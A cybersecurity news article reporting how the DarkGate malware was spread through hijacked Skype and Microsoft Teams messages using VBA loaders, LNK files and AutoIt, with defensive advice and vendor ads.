Hackers utilized the Teams and Skype messaging platforms to spread the DarkGate malware to the targeted businesses. When DarkGate malware is installed, a Visual Basic for Applications (VBA) loader script is delivered to victims.
The Windows-based malware known as DARKGATE is capable of remote access to target endpoints, file encryption, cryptocurrency mining, and credential theft. It was initially made public in 2018.
According to Trend Micro, darkGate attacks were spotted in the Americas, followed closely by those in Asia, the Middle East, and Africa.
Implementing AI-Powered Email security solutions “Trustifi” can secure your business from today’s most dangerous email threats, such as Email Tracking, Blocking, Modifying, Phishing, Account Take Over, Business Email Compromise, Malware & Ransomware
To deploy and carry out its illicit capabilities, DarkGate also uses the automation and scripting tool AutoIt, which is designed for Windows. AutoIt is a genuine tool, but other malware families commonly utilize it to get through defenses and add an extra layer of obfuscation.
The attacker simply utilized the hijacked Skype account to hijack an existing conversation thread and send a message that looked like a PDF file but was a malicious VBS script.
“The threat actor abused a trusted relationship between the two organizations to deceive the recipient into executing the attached VBA script”, researchers said.
Hence, the recipient recognized the sender as a member of a reliable external source. Researchers observed that the curl command, in this case, was used to retrieve the legitimate AutoIt application and the associated malicious files.
Another instance included a threat delivering a link through a Microsoft Teams message. In this instance, the victim was exposed to the possibility of spam since the organization’s technology lets them receive notifications from outside users.
The attackers concealed a.LNK file in the Teams version of the breach. Additionally, an unidentified external sender sent the sample that abused Teams.
“The downloaded artifacts contained both legitimate copy of AutoIt and a maliciously compiled AutoIt script file that contained the malicious capabilities of DarkGate,” researchers said.
Cybercriminals may use these payloads to spread malware, such as cryptocurrency miners, info stealers, ransomware, malicious and/or abusive remote management tools, and ransomware.
The organization should have control over instant messaging applications so that regulations like prohibiting external domains, limiting attachments, and, if practical, adopting scanning may be enforced.
If legitimate credentials are compromised, multifactor authentication (MFA) is strongly advised for securing apps. This reduces the threat of attacks utilizing these methods spreading.
Protect yourself from vulnerabilities using Patch Manager Plus to patch over 850 third-party applications quickly. Take advantage of the free trial to ensure 100% security.
A security researcher identified a vulnerability in TeslaLogger, a third-party software used to collect data…
Threat intelligence feeds provide real-time updates on indicators of compromise (IOCs), such as malicious IPs…
Malware experts all over the world can't do their jobs without YARA. YARA has been…
The cybersecurity company Proofpoint has found a new operation using the SugarGh0st Remote Access Trojan…
The email campaign impersonates the Facebook Ads Team to trick users into clicking a malicious…
"Encrypted DNS Implementation Guidance," a detailed document from the Cybersecurity and Infrastructure Security Agency (CISA),…